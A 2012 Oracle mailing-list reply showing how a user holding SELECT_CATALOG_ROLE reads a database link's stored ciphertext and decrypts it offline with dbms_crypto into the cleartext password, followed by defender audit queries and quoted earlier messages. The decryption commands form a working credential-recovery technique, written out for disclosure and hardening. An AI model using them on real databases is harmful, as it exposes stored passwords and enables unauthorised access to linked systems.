RE: Database Link Security et al

From: <oracle_at_ukcert.org.uk>
Date: Mon, 10 Dec 2012 04:31:10 +0000 (GMT)
Message-ID: <jSCSbl3D.1355113870.6889620.oracle_at_ukcert.org.uk>


Hi All,

Just to clarify: restricted access to dbms_crypto on the target server is not a protection, as one can simply copy the ciphertext to a local DB where dbms_crypto is executable.

SQL> CREATE USER DBLINKER IDENTIFIED BY LOWSEC;
User created.

SQL> GRANT SELECT_CATALOG_ROLE TO DBLINKER;
Grant succeeded.

SQL> GRANT CREATE SESSION TO DBLINKER;
Grant succeeded.

SQL> CONN DBLINKER/LOWSEC;
Connected.

SQL> SELECT PASSWORDX FROM SYS.KU$_DBLINK_VIEW;

PASSWORDX
058CC531A7BBC08390C066B29CB2E26AF1

SQL> DESC DBMS_CRYPTO;
ERROR:
ORA-04043: object "SYS"."DBMS_CRYPTO" does not exist

Copy the ciphertext to a local DB with an executable dbms_crypto:

SQL> select utl_raw.cast_to_varchar2(dbms_crypto.decrypt(
       (substr('058CC531A7BBC08390C066B29CB2E26AF1',19)),
       4353,
       (substr('058CC531A7BBC08390C066B29CB2E26AF1',3,16)))) from dual;

UTL_RAW.CAST_TO_VARCHAR2(DBMS_CRYPTO.DECRYPT((SUBSTR('058CC531A7BBC08390C066B29C
MYPW

The control is restricting access to the ciphertext, and that is open to SELECT_CATALOG_ROLE in 11.2/10.x, though fixed in 11.2.0.3 and 11.2.0.2 with PSU.

Definitely worth making sure that the dblink accounts are min priv'd and the passwords are not used for other accounts such as SYS.

Keep safe.
Paul

--
www.oraclesecurity.com
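A defender-side inventory for the exposure Paul demonstrates, added here as an example and not code from the thread or from oraclesecurity.com: it lists every account that reaches SELECT_CATALOG_ROLE (directly or through a nested role), flags the database links whose stored password would hurt most if recovered, shows the patch history so the 11.2.0.3 / PSU fix can be confirmed, and lists direct grants on the ciphertext sources that bypass the role check. It assumes a DBA session on a 10g/11g instance with the standard data dictionary views.

```sql
-- Added example: defender-side checks for the database-link password
-- exposure discussed in the thread. Run as a DBA; assumes standard
-- 10g/11g data dictionary views.

-- 1. Every user who can read the link ciphertext through
--    SELECT_CATALOG_ROLE, including grants that arrive via nested roles
--    (DBA itself carries SELECT_CATALOG_ROLE, so DBA-holders show up here).
SELECT h.grantee, u.account_status
  FROM (SELECT DISTINCT grantee
          FROM dba_role_privs
         START WITH granted_role = 'SELECT_CATALOG_ROLE'
       CONNECT BY NOCYCLE PRIOR grantee = granted_role) h
  LEFT JOIN dba_users u ON u.username = h.grantee
 WHERE h.grantee NOT IN (SELECT role FROM dba_roles)   -- users only
 ORDER BY h.grantee;

-- 2. Links whose stored password would be the most damaging to recover:
--    PUBLIC links (usable from every session) and links that connect to
--    the remote side as SYS or SYSTEM. These are the ones to re-point at a
--    minimally privileged, link-only account with a password used nowhere else.
SELECT owner, db_link, username, host, created
  FROM dba_db_links
 WHERE owner = 'PUBLIC'
    OR username IN ('SYS', 'SYSTEM')
 ORDER BY owner, db_link;

-- 3. Patch history, to confirm that the PSU / 11.2.0.3 level the thread
--    mentions has actually been applied on this instance.
SELECT action_time, action, version, id, comments
  FROM dba_registry_history
 ORDER BY action_time;

-- 4. Direct object grants on the ciphertext sources; these bypass the
--    role check in query 1 entirely and should normally return no rows.
SELECT grantee, owner, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('LINK$', 'KU$_DBLINK_VIEW')
 ORDER BY grantee;
```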

On 12/3/2012, "Jeff Chirco" <JChirco_at_innout.com> wrote:


>As a DBA user I get an invalid identifier on dbms_crypto.decrypt and I also cannot read sys.link$ or ku$_dblink_view. But as SYS both work. I am running 11.2.0.2 EE on Windows.
>
>
>-----Original Message-----
>From: oracle-l-bounce_at_freelists.org [mailto:oracle-l-bounce_at_freelists.org] On Behalf Of rjamya
>Sent: Wednesday, November 28, 2012 11:26 AM
>To: mark.powell2_at_hp.com
>Cc: oracle-l_at_freelists.org
>Subject: Re: Database Link Security et al
>
>I was able to read the view as dba user in 11202.
>Raj
>
>
>On Wed, Nov 28, 2012 at 2:16 PM, Powell, Mark <mark.powell2_at_hp.com> wrote:
>
>> I was unable to read the ku$ view as a DBA so if you have to be a
>> sysdba user to read the view how much of a problem is this really?
>>
>>
>
>
>--
>http://www.freelists.org/webpage/oracle-l
Received on Mon Dec 10 2012 - 05:31:10 CET